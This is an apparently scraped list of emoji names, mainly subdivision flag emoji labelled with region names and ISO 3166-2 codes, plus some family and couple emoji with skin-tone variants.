🏴 Flag for Eastern (SL-E)
🏴 Flag for Acquaviva (SM-01)
🏴 Flag for Kolda (SN-KD)
🏴 Flag for Saint-Louis (SN-SL)
🏴 Flag for San Marino (SM-07)
🏴 Flag for Louga (SN-LG)
🏴 Flag for Domagnano (SM-03)
🏴 Flag for Eastern Equatoria (SS-EE)
🏴 Flag for Saramacca (SR-SA)
👩🏾👧🏾 Family - Woman: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
🏴 Flag for Marowijne (SR-MA)
🏴 Flag for Middle Juba (SO-JD)
🏴 Flag for Mudug (SO-MU)
🏴 Flag for Lower Shebelle (SO-SH)
🏴 Flag for Hiran (SO-HI)
🏴 Flag for Central Equatoria (SS-EC)
🏴 Flag for Ziguinchor (SN-ZG)
🏴 Flag for Coronie (SR-CR)
🏴 Flag for Middle Shebelle (SO-SD)
🏴 Flag for Upper Nile (SS-NU)
🏴 Flag for Wanica (SR-WA)
🏴 Flag for Awdal (SO-AW)
🏴 Flag for Sanaag (SO-SA)
🏴 Flag for Lower Juba (SO-JH)
🏴 Flag for Lakes (SS-LK)
🏴 Flag for Warrap (SS-WR)
🏴 Flag for Príncipe (ST-P)
🏴 Flag for Sipaliwini (SR-SI)
🏴 Flag for Western Bahr el Ghazal (SS-BW)
🏴 Flag for Western Equatoria (SS-EW)
🏴 Flag for Bari (SO-BR)
🏴 Flag for Jonglei (SS-JG)
🏴 Flag for Paramaribo (SR-PM)
🏴 Flag for Commewijne (SR-CM)
🏴 Flag for Galguduud (SO-GA)
🏴 Flag for Nickerie (SR-NI)
🏴 Flag for Para (SR-PR)
🏴 Flag for Woqooyi Galbeed (SO-WO)
🏴 Flag for Gedo (SO-GE)
🏴 Flag for Bay, Somalia (SO-BY)
🏴 Flag for Brokopondo (SR-BR)
🏴 Flag for Nugal (SO-NU)
🏴 Flag for Togdheer (SO-TO)
🏴 Flag for Bakool (SO-BK)
🏴 Flag for Sool (SO-SO)
🏴 Flag for Hhohho (SZ-HH)
🏴 Flag for Ennedi-Ouest (TD-EO)
🏴 Flag for Guéra (TD-GR)
🏴 Flag for Shiselweni (SZ-SH)
🏴 Flag for Daraa (SY-DR)
🏴 Flag for Ar-Raqqah (SY-RA)
🏴 Flag for Sonsonate (SV-SO)
🏴 Flag for La Unión (SV-UN)
🏴 Flag for San Miguel (SV-SM)
🏴 Flag for Morazán (SV-MO)
🏴 Flag for San Salvador (SV-SS)
🏴 Flag for Deir ez-Zor (SY-DY)
🏴 Flag for Cabañas (SV-CA)
🏴 Flag for Lubombo (SZ-LU)
🏴 Flag for Chalatenango (SV-CH)
🏴 Flag for Rif Dimashq (SY-RD)
🏴 Flag for Tartus (SY-TA)
🏴 Flag for Borkou (TD-BO)
🏴 Flag for Manzini (SZ-MA)
🏴 Flag for Batha (TD-BA)
🏴 Flag for Homs (SY-HI)
🏴 Flag for Ennedi-Est (TD-EE)
🏴 Flag for Bahr el Gazel (TD-BG)
🏴 Flag for Kanem (TD-KA)
🏴 Flag for Hama (SY-HM)
🏴 Flag for Latakia (SY-LA)
🏴 Flag for Idlib (SY-ID)
🏴 Flag for La Libertad (SV-LI)
🏴 Flag for Aleppo (SY-HL)
🏴 Flag for Ahuachapán (SV-AH)
🏴 Flag for Chari-Baguirmi (TD-CB)
🏴 Flag for La Paz (SV-PA)
🏴 Flag for As-Suwayda (SY-SU)
🏴 Flag for Damascus (SY-DI)
🏴 Flag for Quneitra (SY-QU)
🏴 Flag for Al-Hasakah (SY-HA)
🏴 Flag for Santa Ana (SV-SA)
🏴 Flag for Cuscatlán (SV-CU)
🏴 Flag for Logone Occidental (TD-LO)
🏴 Flag for Chanthaburi (TH-22)
🏴 Flag for Mayo-Kebbi Est (TD-ME)
🏴 Flag for Moyen-Chari (TD-MC)
🏴 Flag for Logone Oriental (TD-LR)
🏴 Flag for Savanes (TG-S)
🏴 Flag for Phra Nakhon Si Ayutthaya (TH-14)
🏴 Flag for Centrale (TG-C)
🏴 Flag for Sa Kaeo (TH-27)
🏴 Flag for Nonthaburi (TH-12)
🏴 Flag for Buri Ram (TH-31)
🏴 Flag for Chon Buri (TH-20)
🏴 Flag for Sila (TD-SI)
🏴 Flag for Lac (TD-LC)
🏴 Flag for Rayong (TH-21)
🏴 Flag for Prachin Buri (TH-25)
🏴 Flag for Nakhon Ratchasima (TH-30)
🏴 Flag for Kara (TG-K)
🏴 Flag for Ang Thong (TH-15)
🏴 Flag for Bangkok (TH-10)
🏴 Flag for Mandoul (TD-MA)
🏴 Flag for Pathum Thani (TH-13)
🏴 Flag for Chachoengsao (TH-24)
🏴 Flag for Sing Buri (TH-17)
🏴 Flag for Mayo-Kebbi Ouest (TD-MO)
🏴 Flag for Ouaddaï (TD-OD)
🏴 Flag for Surin (TH-32)
🏴 Flag for Nakhon Nayok (TH-26)
🏴 Flag for Salamat (TD-SA)
🏴 Flag for Tandjilé (TD-TA)
🏴 Flag for Wadi Fira (TD-WF)
🏴 Flag for Saraburi (TH-19)
🏴 Flag for Samut Prakan (TH-11)
🏴 Flag for Tibesti (TD-TI)
🏴 Flag for Plateaux (TG-P)
🏴 Flag for N’Djamena (TD-ND)
🏴 Flag for Chai Nat (TH-18)
🏴 Flag for Kamphaeng Phet (TH-62)
🏴 Flag for Suphanburi (TH-72)
🏴 Flag for Samut Sakhon (TH-74)
🏴 Flag for Phetchabun (TH-67)
🏴 Flag for Kanchanaburi (TH-71)
🏴 Flag for Phrae (TH-54)
🏴 Flag for Tak (TH-63)
🏴 Flag for Nakhon Phanom (TH-48)
🏴 Flag for Lampang (TH-52)
🏴 Flag for Mae Hong Son (TH-58)
🏴 Flag for Sakon Nakhon (TH-47)
🏴 Flag for Phayao (TH-56)
🏴 Flag for Udon Thani (TH-41)
🏴 Flag for Mukdahan (TH-49)
🏴 Flag for Nakhon Pathom (TH-73)
🏴 Flag for Chiang Mai (TH-50)
🏴 Flag for Khon Kaen (TH-40)
🏴 Flag for Amnat Charoen (TH-37)
🏴 Flag for Ratchaburi (TH-70)
🏴 Flag for Yasothon (TH-35)
🏴 Flag for Lamphun (TH-51)
🏴 Flag for Loei (TH-42)
🏴 Flag for Nakhon Sawan (TH-60)
🏴 Flag for Ubon Ratchathani (TH-34)
🏴 Flag for Maha Sarakham (TH-44)
🏴 Flag for Roi Et (TH-45)
🏴 Flag for Kalasin (TH-46)
🏴 Flag for Phichit (TH-66)
🏴 Flag for Nan (TH-55)
🏴 Flag for Uthai Thani (TH-61)
🏴 Flag for Bueng Kan (TH-38)
🏴 Flag for Si Sa Ket (TH-33)
🏴 Flag for Nong Bua Lam Phu (TH-39)
🏴 Flag for Uttaradit (TH-53)
🏴 Flag for Chiang Rai (TH-57)
🏴 Flag for Sukhothai (TH-64)
🏴 Flag for Nong Khai (TH-43)
🏴 Flag for Phitsanulok (TH-65)
🏴 Flag for Ermera (TL-ER)
🏴 Flag for Oecusse (TL-OE)
🏴 Flag for Liquiçá (TL-LI)
🏴 Flag for Aileu (TL-AL)
🏴 Flag for Ahal (TM-A)
🏴 Flag for Surat Thani (TH-84)
🏴 Flag for Phetchaburi (TH-76)
🏴 Flag for Bobonaro (TL-BO)
🏴 Flag for Manatuto (TL-MT)
🏴 Flag for Khatlon (TJ-KT)
🏴 Flag for Ainaro (TL-AN)
🏴 Flag for Phang Nga (TH-82)
🏴 Flag for Cova Lima (TL-CO)
🏴 Flag for Tunis (TN-11)
🏴 Flag for Ranong (TH-85)
🏴 Flag for Nakhon Si Thammarat (TH-80)
🏴 Flag for Prachuap Khiri Khan (TH-77)
🏴 Flag for Dushanbe (TJ-DU)
🏴 Flag for Yala (TH-95)
🏴 Flag for Songkhla (TH-90)
🏴 Flag for Lebap (TM-L)
🏴 Flag for Narathiwat (TH-96)
🏴 Flag for Mary (TM-M)
🏴 Flag for Manufahi (TL-MF)
👨🏼👨🏼👦🏼👶🏼 Family - Man: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
🏴 Flag for Balkan (TM-B)
🏴 Flag for Baucau (TL-BA)
🏴 Flag for Nohiyahoi Tobei Jumhurí (TJ-RA)
🏴 Flag for Trang (TH-92)
🏴 Flag for Sughd (TJ-SU)
🏴 Flag for Viqueque (TL-VI)
🏴 Flag for Pattani (TH-94)
🏴 Flag for Krabi (TH-81)
🏴 Flag for Dili (TL-DI)
🏴 Flag for Phuket (TH-83)
🏴 Flag for Satun (TH-91)
🏴 Flag for Pattaya (TH-S)
🏴 Flag for Daşoguz (TM-D)
🏴 Flag for Kairouan (TN-41)
🏴 Flag for Monastir (TN-52)
🏴 Flag for Aydın (TR-09)
🏴 Flag for Béja (TN-31)
🏴 Flag for Antalya (TR-07)
🏴 Flag for Nabeul (TN-21)
🏴 Flag for Mahdia (TN-53)
🏴 Flag for Haʻapai (TO-02)
🏴 Flag for Amasya (TR-05)
🏴 Flag for Bitlis (TR-13)
🏴 Flag for Ariana (TN-12)
🏴 Flag for Kebili (TN-73)
🏴 Flag for Adana (TR-01)
🏴 Flag for ʻEua (TO-01)
🏴 Flag for Bingöl (TR-12)
🏴 Flag for Tataouine (TN-83)
🏴 Flag for Artvin (TR-08)
🏴 Flag for Sousse (TN-51)
🏴 Flag for Gabès (TN-81)
🏴 Flag for Ağrı (TR-04)
🏴 Flag for Bilecik (TR-11)
🏴 Flag for Jendouba (TN-32)
🏴 Flag for Tongatapu (TO-04)
🏴 Flag for Adıyaman (TR-02)
🏴 Flag for Kef (TN-33)
🏴 Flag for Zaghouan (TN-22)
🏴 Flag for Balıkesir (TR-10)
🏴 Flag for Ben Arous (TN-13)
🏴 Flag for Niuas (TO-03)
🏴 Flag for Tozeur (TN-72)
🏴 Flag for Manouba (TN-14)
🏴 Flag for Kasserine (TN-42)
🏴 Flag for Bolu (TR-14)
🏴 Flag for Siliana (TN-34)
🏴 Flag for Vavaʻu (TO-05)
🏴 Flag for Ankara (TR-06)
🏴 Flag for Sfax (TN-61)
🏴 Flag for Sidi Bouzid (TN-43)
🏴 Flag for Medenine (TN-82)
🏴 Flag for Bizerte (TN-23)
🏴 Flag for Erzincan (TR-24)
🏴 Flag for Kahramanmaraş (TR-46)
🏴 Flag for Kars (TR-36)
🏴 Flag for Niğde (TR-51)
🏴 Flag for Kayseri (TR-38)
🏴 Flag for Kocaeli (TR-41)
🏴 Flag for Çankırı (TR-18)
🏴 Flag for Muğla (TR-48)
🏴 Flag for Konya (TR-42)
🏴 Flag for Malatya (TR-44)
🏴 Flag for Gümüşhane (TR-29)
🏴 Flag for Edirne (TR-22)
🏴 Flag for Kırklareli (TR-39)
🏴 Flag for Gaziantep (TR-27)
🏴 Flag for Samsun (TR-55)
🏴 Flag for Diyarbakır (TR-21)
🏴 Flag for Bursa (TR-16)
🏴 Flag for Çorum (TR-19)
🏴 Flag for Ordu (TR-52)
🏴 Flag for Manisa (TR-45)
🏴 Flag for Erzurum (TR-25)
🏴 Flag for Burdur (TR-15)
🏴 Flag for Isparta (TR-32)
🏴 Flag for Istanbul (TR-34)
🏴 Flag for Hakkâri (TR-30)
🏴 Flag for Hatay (TR-31)
🏴 Flag for Muş (TR-49)
🏴 Flag for Mersin (TR-33)
🏴 Flag for Siirt (TR-56)
🏴 Flag for Nevşehir (TR-50)
🏴 Flag for Elazığ (TR-23)
🏴 Flag for Giresun (TR-28)
🏴 Flag for Denizli (TR-20)
🏴 Flag for Mardin (TR-47)
🏴 Flag for Kastamonu (TR-37)
🏴 Flag for Sakarya (TR-54)
🏴 Flag for Kırşehir (TR-40)
🏴 Flag for Çanakkale (TR-17)
🏴 Flag for Rize (TR-53)
🏴 Flag for Eskişehir (TR-26)
🏴 Flag for Van (TR-65)
🏴 Flag for Princes Town (TT-PRT)
🏴 Flag for Couva-Tabaquite-Talparo (TT-CTT)
🏴 Flag for Tobago (TT-TOB)
🏴 Flag for Şanlıurfa (TR-63)
🏴 Flag for Arima (TT-ARI)
🏴 Flag for Zonguldak (TR-67)
🏴 Flag for Siparia (TT-SIP)
🏴 Flag for Ardahan (TR-75)
🏴 Flag for Kilis (TR-79)
🏴 Flag for Port of Spain (TT-POS)
🏴 Flag for Aksaray (TR-68)
🏴 Flag for Diego Martin (TT-DMN)
🏴 Flag for Bayburt (TR-69)
🏴 Flag for Tekirdağ (TR-59)
🏴 Flag for Batman (TR-72)
🏴 Flag for Chaguanas (TT-CHA)
🏴 Flag for Osmaniye (TR-80)
🏴 Flag for Yalova (TR-77)
🏴 Flag for San Juan-Laventille (TT-SJL)
🏴 Flag for Karabük (TR-78)
🏴 Flag for Yozgat (TR-66)
🏴 Flag for Mayaro-Rio Claro (TT-MRC)
🏴 Flag for Uşak (TR-64)
🏴 Flag for Sinop (TR-57)
🏴 Flag for Tunapuna-Piarco (TT-TUP)
🏴 Flag for Bartın (TR-74)
🏴 Flag for Kırıkkale (TR-71)
🏴 Flag for Penal-Debe (TT-PED)
🏴 Flag for Iğdır (TR-76)
🏴 Flag for Şırnak (TR-73)
🏴 Flag for Trabzon (TR-61)
🏴 Flag for Point Fortin (TT-PTF)
🏴 Flag for Tunceli (TR-62)
🏴 Flag for Tokat (TR-60)
🏴 Flag for Karaman (TR-70)
🏴 Flag for San Fernando (TT-SFO)
🏴 Flag for Sivas (TR-58)
🏴 Flag for Zanzibar North (TZ-07)
🏴 Flag for Changhua (TW-CHA)
🏴 Flag for Vaitupu (TV-VAI)
🏴 Flag for Kaohsiung (TW-KHH)
🏴 Flag for Kilimanjaro (TZ-09)
🏴 Flag for Kinmen (TW-KIN)
🏴 Flag for Penghu (TW-PEN)
🏴 Flag for Tainan (TW-TNN)
🏴 Flag for Nukufetau (TV-NKF)
🏴 Flag for Kigoma (TZ-08)
🏴 Flag for Taipei (TW-TPE)
🏴 Flag for Pingtung (TW-PIF)
🏴 Flag for Yilan (TW-ILA)
🏴 Flag for Taoyuan (TW-TAO)
🏴 Flag for Dodoma (TZ-03)
🏴 Flag for Nui (TV-NUI)
🏴 Flag for Niutao (TV-NIT)
🏴 Flag for North Pemba (TZ-06)
🏴 Flag for New Taipei (TW-NWT)
🏴 Flag for Iringa (TZ-04)
🏴 Flag for Kagera (TZ-05)
🏴 Flag for Yunlin (TW-YUN)
🏴 Flag for Lienchiang (TW-LIE)
🏴 Flag for Nanumanga (TV-NMG)
🏴 Flag for Dar es Salaam (TZ-02)
🏴 Flag for Nanumea (TV-NMA)
🏴 Flag for Taitung (TW-TTT)
🏴 Flag for Nantou (TW-NAN)
🏴 Flag for Chiayi (TW-CYQ)
🏴 Flag for Arusha (TZ-01)
🏴 Flag for Hualien (TW-HUA)
🏴 Flag for Chiayi County (TW-CYI)
🏴 Flag for Taichung (TW-TXG)
🏴 Flag for Keelung (TW-KEE)
🏴 Flag for Miaoli (TW-MIA)
🏴 Flag for Crimea (UA-43)
🏴 Flag for Lindi (TZ-12)
🏴 Flag for Manyara (TZ-26)
🏴 Flag for Luhanshchyna (UA-09)
🏴 Flag for Rukwa (TZ-20)
🏴 Flag for Dnipropetrovshchyna (UA-12)
🏴 Flag for Volyn (UA-07)
🏴 Flag for Shinyanga (TZ-22)
🏴 Flag for Vinnychchyna (UA-05)
🏴 Flag for Ruvuma (TZ-21)
🏴 Flag for Katavi (TZ-28)
🏴 Flag for Zaporizhzhya (UA-23)
🏴 Flag for Kyivshchyna (UA-32)
🏴 Flag for Singida (TZ-23)
🏴 Flag for Tabora (TZ-24)
🏴 Flag for Mara (TZ-13)
🏴 Flag for Geita (TZ-27)
🏴 Flag for Simiyu (TZ-30)
🏴 Flag for Mykolayivschyna (UA-48)
🏴 Flag for Kirovohradschyna (UA-35)
🏴 Flag for Rivnenshchyna (UA-56)
🏴 Flag for Poltavshchyna (UA-53)
🏴 Flag for Mbeya (TZ-14)
🏴 Flag for Mwanza (TZ-18)
🏴 Flag for Zakarpattia (UA-21)
🏴 Flag for South Pemba (TZ-10)
🏴 Flag for Pwani (TZ-19)
🏴 Flag for Mtwara (TZ-17)
🏴 Flag for Sevastopol (UA-40)
🏴 Flag for Odeshchyna (UA-51)
🏴 Flag for Lvivshchyna (UA-46)
🏴 Flag for Donechchyna (UA-14)
🏴 Flag for Prykarpattia (UA-26)
🏴 Flag for Zanzibar Urban/West (TZ-15)
🏴 Flag for Morogoro (TZ-16)
🏴 Flag for Njombe (TZ-29)
🏴 Flag for Chernivtsi Oblast (UA-77)
🏴 Flag for Palmyra Atoll (UM-95)
🏴 Flag for Kansas (US-KS)
👨🏽👨🏽👦🏽👶🏽 Family - Man: Medium Skin Tone, Man: Medium Skin Tone, Boy: Medium Skin Tone, Baby: Medium Skin Tone
🏴 Flag for Arizona (US-AZ)
🏴 Flag for Johnston Atoll (UM-67)
🏴 Flag for Chernihivshchyna (UA-74)
🏴 Flag for Howland Island (UM-84)
🏴 Flag for Georgia (US-GA)
🏴 Flag for Hawaii (US-HI)
🏴 Flag for Midway Atoll (UM-71)
🏴 Flag for American Samoa (US-AS)
🏴 Flag for Connecticut (US-CT)
🏴 Flag for Iowa (US-IA)
🏴 Flag for Ternopilshchyna (UA-61)
🏴 Flag for Northern (UG-N)
🏴 Flag for Guam (US-GU)
🏴 Flag for Baker Island (UM-81)
🏴 Flag for Eastern (UG-E)
🏴 Flag for Khersonshchyna (UA-65)
🏴 Flag for Sumshchyna (UA-59)
🏴 Flag for Indiana (US-IN)
🏴 Flag for Arkansas (US-AR)
🏴 Flag for Delaware (US-DE)
🏴 Flag for Kharkivshchyna (UA-63)
🏴 Flag for Alabama (US-AL)
🏴 Flag for Western (UG-W)
🏴 Flag for Khmelnychchyna (UA-68)
🏴 Flag for Navassa Island (UM-76)
🏴 Flag for Jarvis Island (UM-86)
🏴 Flag for Idaho (US-ID)
🏴 Flag for Kingman Reef (UM-89)
🏴 Flag for Florida (US-FL)
🏴 Flag for Wake Island (UM-79)
🏴 Flag for Illinois (US-IL)
🏴 Flag for Washington DC (US-DC)
🏴 Flag for Cherkashchyna (UA-71)
🏴 Flag for New York (US-NY)
👨🏾👨🏾👦🏾👶🏾 Family - Man: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
🏴 Flag for North Carolina (US-NC)
🏴 Flag for Mississippi (US-MS)
🏴 Flag for Massachusetts (US-MA)
🏴 Flag for Nevada (US-NV)
🏴 Flag for Wisconsin (US-WI)
🏴 Flag for Maryland (US-MD)
🏴 Flag for New Mexico (US-NM)
🏴 Flag for Puerto Rico (US-PR)
🏴 Flag for U.S. Outlying Islands (US-UM)
🏴 Flag for Wyoming (US-WY)
🏴 Flag for Ohio (US-OH)
🏴 Flag for Kentucky (US-KY)
🏴 Flag for New Jersey (US-NJ)
🏴 Flag for Oregon (US-OR)
🏴 Flag for Michigan (US-MI)
🏴 Flag for U.S. Virgin Islands (US-VI)
🏴 Flag for Missouri (US-MO)
🏴 Flag for Pennsylvania (US-PA)
🏴 Flag for Virginia (US-VA)
🏴 Flag for Artigas (UY-AR)
🏴 Flag for Canelones (UY-CA)
🏴 Flag for Washington (US-WA)
🏴 Flag for South Carolina (US-SC)
🏴 Flag for Maine (US-ME)
🏴 Flag for Louisiana (US-LA)
🏴 Flag for Minnesota (US-MN)
🏴 Flag for Rhode Island (US-RI)
🏴 Flag for West Virginia (US-WV)
🏴 Flag for Texas (US-TX)
🏴 Flag for Utah (US-UT)
🏴 Flag for Oklahoma (US-OK)
🏴 Flag for New Hampshire (US-NH)
🏴 Flag for Samarqand (UZ-SA)
🏴 Flag for Maldonado (UY-MA)
🏴 Flag for Namangan (UZ-NG)
🏴 Flag for Charlotte (VC-01)
🏴 Flag for Salto (UY-SA)
🏴 Flag for Cerro Largo (UY-CL)
🏴 Flag for Tacuarembó (UY-TA)
🏴 Flag for Capital (VE-A)
🏴 Flag for Anzoátegui (VE-B)
🏴 Flag for Saint Andrew (VC-02)
🏴 Flag for Soriano (UY-SO)
🏴 Flag for Rocha (UY-RO)
🏴 Flag for Saint David (VC-03)
🏴 Flag for San José (UY-SJ)
🏴 Flag for Florida (UY-FD)
🏴 Flag for Colonia (UY-CO)
🏴 Flag for Flores (UY-FS)
🏴 Flag for Xorazm (UZ-XO)
🏴 Flag for Durazno (UY-DU)
🏴 Flag for Andijan (UZ-AN)
🏴 Flag for Aragua (VE-D)
🏴 Flag for Sirdaryo (UZ-SI)
🏴 Flag for Paysandú (UY-PA)
🏴 Flag for Grenadines (VC-06)
🏴 Flag for Rivera (UY-RV)
🏴 Flag for Lavalleja (UY-LA)
🏴 Flag for Surxondaryo (UZ-SU)
🏴 Flag for Tashkent Province (UZ-TO)
🏴 Flag for Qashqadaryo (UZ-QA)
🏴 Flag for Treinta y Tres (UY-TT)
🏴 Flag for Montevideo (UY-MO)
🏴 Flag for Bukhara (UZ-BU)
🏴 Flag for Fergana (UZ-FA)
🏴 Flag for Karakalpakstan (UZ-QR)
🏴 Flag for Jizzakh (UZ-JI)
🏴 Flag for Río Negro (UY-RN)
🏴 Flag for Tashkent (UZ-TK)
🏴 Flag for Saint Patrick (VC-05)
🏴 Flag for Navoiy (UZ-NW)
🏴 Flag for Lara (VE-K)
🏴 Flag for Nueva Esparta (VE-O)
🏴 Flag for Táchira (VE-S)
🏴 Flag for Bolívar (VE-F)
🏴 Flag for Thanh Hóa (VN-21)
🏴 Flag for Hòa Bình (VN-14)
🏴 Flag for Guárico (VE-J)
🏴 Flag for Cojedes (VE-H)
🏴 Flag for Thừa Thiên–Huế (VN-26)
🏴 Flag for Portuguesa (VE-P)
🏴 Flag for Ninh Bình (VN-18)
🏴 Flag for Sucre (VE-R)
🏴 Flag for Lai Châu (VN-01)
🏴 Flag for Lạng Sơn (VN-09)
🏴 Flag for Miranda (VE-M)
🏴 Flag for Quảng Bình (VN-24)
🏴 Flag for Barinas (VE-E)
🏴 Flag for Monagas (VE-N)
🏴 Flag for Nghệ An (VN-22)
🏴 Flag for Lào Cai (VN-02)
🏴 Flag for Tuyên Quang (VN-07)
🏴 Flag for Sơn La (VN-05)
🏴 Flag for Thái Bình (VN-20)
🏴 Flag for Federal Dependencies (VE-W)
🏴 Flag for Quảng Ngãi (VN-29)
🏴 Flag for Mérida (VE-L)
🏴 Flag for Falcón (VE-I)
🏴 Flag for Cao Bằng (VN-04)
🏴 Flag for Amazonas (VE-Z)
🏴 Flag for Yên Bái (VN-06)
🏴 Flag for Hà Tĩnh (VN-23)
🏴 Flag for Kon Tum (VN-28)
🏴 Flag for Vargas (VE-X)
🏴 Flag for Yaracuy (VE-U)
🏴 Flag for Trujillo (VE-T)
🏴 Flag for Quảng Ninh (VN-13)
🏴 Flag for Hà Giang (VN-03)
🏴 Flag for Quảng Nam (VN-27)
🏴 Flag for Bắc Ninh (VN-56)
🏴 Flag for Ninh Thuận (VN-36)
🏴 Flag for Thái Nguyên (VN-69)
🏴 Flag for Nam Định (VN-67)
🏴 Flag for Lâm Đồng (VN-35)
🏴 Flag for Hải Dương (VN-61)
🏴 Flag for Sóc Trăng (VN-52)
🏴 Flag for Hậu Giang (VN-73)
🏴 Flag for Vĩnh Phúc (VN-70)
🏴 Flag for Bến Tre (VN-50)
🏴 Flag for Bắc Kạn (VN-53)
🏴 Flag for Bắc Giang (VN-54)
🏴 Flag for Đắk Lắk (VN-33)
🏴 Flag for Bình Dương (VN-57)
🏴 Flag for Da Nang (VN-DN)
🏴 Flag for Tiền Giang (VN-46)
🏴 Flag for Bà Rịa–Vũng Tàu (VN-43)
🏴 Flag for Điện Biên (VN-71)
🏴 Flag for Bình Phước (VN-58)
🏴 Flag for Can Tho (VN-CT)
🏴 Flag for Bạc Liêu (VN-55)
🏴 Flag for Phú Yên (VN-32)
🏴 Flag for An Giang (VN-44)
🏴 Flag for Hà Nam (VN-63)
🏴 Flag for Cà Mau (VN-59)
🏴 Flag for Kiên Giang (VN-47)
🏴 Flag for Khánh Hòa (VN-34)
🏴 Flag for Đồng Tháp (VN-45)
🏴 Flag for Đồng Nai (VN-39)
🏴 Flag for Hanoi (VN-HN)
🏴 Flag for Vĩnh Long (VN-49)
🏴 Flag for Phú Thọ (VN-68)
🏴 Flag for Tây Ninh (VN-37)
🏴 Flag for Gia Lai (VN-30)
🏴 Flag for Đắk Nông (VN-72)
🏴 Flag for Bình Thuận (VN-40)
🏴 Flag for Long An (VN-41)
🏴 Flag for Bình Định (VN-31)
🏴 Flag for Uvea (WF-UV)
🏴 Flag for Sa’dah (YE-SD)
🏴 Flag for Abyan (YE-AB)
🏴 Flag for Hajjah (YE-HJ)
🏴 Flag for Malampa (VU-MAP)
🏴 Flag for Atua (WS-AT)
🏴 Flag for Va’a-o-Fonoti (WS-VF)
🏴 Flag for Al Hudaydah (YE-HU)
🏴 Flag for Palauli (WS-PA)
🏴 Flag for Satupa’itea (WS-SA)
🏴 Flag for Dhale (YE-DA)
🏴 Flag for Tombouctou (ML-6)
🏴 Flag for Raymah (YE-RA)
🏴 Flag for Sanma (VU-SAM)
🏴 Flag for Alo (WF-AL)
🏴 Flag for Al Mahrah (YE-MR)
👨🏻👨🏻👧🏻 Family - Man: Light Skin Tone, Man: Light Skin Tone, Girl: Light Skin Tone
🏴 Flag for ’Adan (YE-AD)
🏴 Flag for Shabwah (YE-SH)
🏴 Flag for Tafea (VU-TAE)
🏴 Flag for Amran (YE-AM)
🏴 Flag for Penama (VU-PAM)
🏴 Flag for Al Mahwit (YE-MW)
🏴 Flag for Gaga’emauga (WS-GE)
🏴 Flag for Hadramaut (YE-HD)
🏴 Flag for Aiga-i-le-Tai (WS-AL)
🏴 Flag for Ma’rib (YE-MA)
🏴 Flag for Al Bayda (YE-BA)
🏴 Flag for Haiphong (VN-HP)
🏴 Flag for A’ana (WS-AA)
🏴 Flag for Sigave (WF-SG)
🏴 Flag for Lahij (YE-LA)
🏴 Flag for Shefa (VU-SEE)
🏴 Flag for Ibb (YE-IB)
🏴 Flag for Torba (VU-TOB)
🏴 Flag for Al Jawf (YE-JA)
🏴 Flag for Tuamasaga (WS-TU)
🏴 Flag for Dhamar (YE-DH)
🏴 Flag for Western Cape (ZA-WC)
🏴 Flag for Arkhabil Suqutra (YE-SU)
🏴 Flag for Matabeleland North (ZW-MN)
🏴 Flag for Mashonaland East (ZW-ME)
🏴 Flag for North-Western (ZM-06)
🏴 Flag for Sana’a (YE-SN)
🏴 Flag for Limpopo (ZA-LP)
🏴 Flag for Eastern (ZM-03)
🏴 Flag for Midlands (ZW-MI)
🏴 Flag for Bulawayo (ZW-BU)
🏴 Flag for Northern (ZM-05)
🏴 Flag for Southern (ZM-07)
🏴 Flag for Free (ZA-FS)
🏴 Flag for Matabeleland South (ZW-MS)
🏴 Flag for Eastern Cape (ZA-EC)
🏴 Flag for Western (ZM-01)
👨🏼👨🏼👧🏼 Family - Man: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
🏴 Flag for Copperbelt (ZM-08)
🏴 Flag for North West (ZA-NW)
🏴 Flag for Muchinga (ZM-10)
🏴 Flag for Gauteng (ZA-GT)
🏴 Flag for Lusaka (ZM-09)
🏴 Flag for Central (ZM-02)
🏴 Flag for Northern Cape (ZA-NC)
🏴 Flag for Mpumalanga (ZA-MP)
🏴 Flag for Taiz (YE-TA)
🏴 Flag for KwaZulu-Natal (ZA-NL)
🏴 Flag for Manicaland (ZW-MA)
🏴 Flag for Masvingo (ZW-MV)
🏴 Flag for Luapula (ZM-04)
🏴 Flag for Mashonaland West (ZW-MW)
🏴 Flag for Harare (ZW-HA)
👨🏽👨🏽👧🏽 Family - Man: Medium Skin Tone, Man: Medium Skin Tone, Girl: Medium Skin Tone
👨🏾👨🏾👧🏾 Family - Man: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
🏴 Flag for Pays-de-la-Loire (FR-PDL)
🏴 Flag for Klaipėdos Municipality (LT-20)
🏴 Flag for Crete (GR-M)
Tag Latin Small Letter X
🏴 Flag for Mazandaran (IR-21)
🏴 Flag for Primorsky Krai (RU-PRI)
🏴 Flag for Fukushima (JP-07)
🏴 Flag for Manitoba (CA-MB)
👨🏻👨🏻👦🏻👦🏻 Family - Man: Light Skin Tone, Man: Light Skin Tone, Boy: Light Skin Tone, Boy: Light Skin Tone
👩🏻❤️👩🏻 Couple With Heart - Woman: Light Skin Tone, Woman: Light Skin Tone
🏴 Flag for Quebec (CA-QC)
👨👩👶 Family: Man, Woman, Baby
🏴 Flag for Kavango East (NA-KE)
🏴 Flag for San Luis Potosí (MX-SLP)
🏴 Flag for Lääne-Viru (EE-59)
🏴 Flag for Bong (LR-BG)
🏴 Flag for Deir al-Balah (PS-DEB)
👨🏿👨🏿👧🏿 Family - Man: Dark Skin Tone, Man: Dark Skin Tone, Girl: Dark Skin Tone
🏴 Flag for Saint Thomas (JM-03)
🏴 Flag for Kayangel (PW-100)
🏴 Flag for Pool (CG-12)
👨❤️👨🏾 Couple With Heart - Man, Man: Medium-Dark Skin Tone
🏴 Flag for Balearic Islands (ES-IB)
👩👨👦 Family: Woman, Man, Boy
🏴 Flag for Uusimaa (FI-18)
👨🏻👩🏻👦🏻👧🏻 Family - Man: Light Skin Tone, Woman: Light Skin Tone, Boy: Light Skin Tone, Girl: Light Skin Tone
🏴 Flag for Ceará (BR-CE)
👨👩👦👶 Family: Man, Woman, Boy, Baby
👨🏻👨🏻👧🏻👦🏻 Family - Man: Light Skin Tone, Man: Light Skin Tone, Girl: Light Skin Tone, Boy: Light Skin Tone
🏴 Flag for Demir Hisar (MK-25)
🏴 Flag for Antofagasta (CL-AN)
🏴 Flag for Christ Church (BB-01)
🏴 Flag for Harju (EE-37)
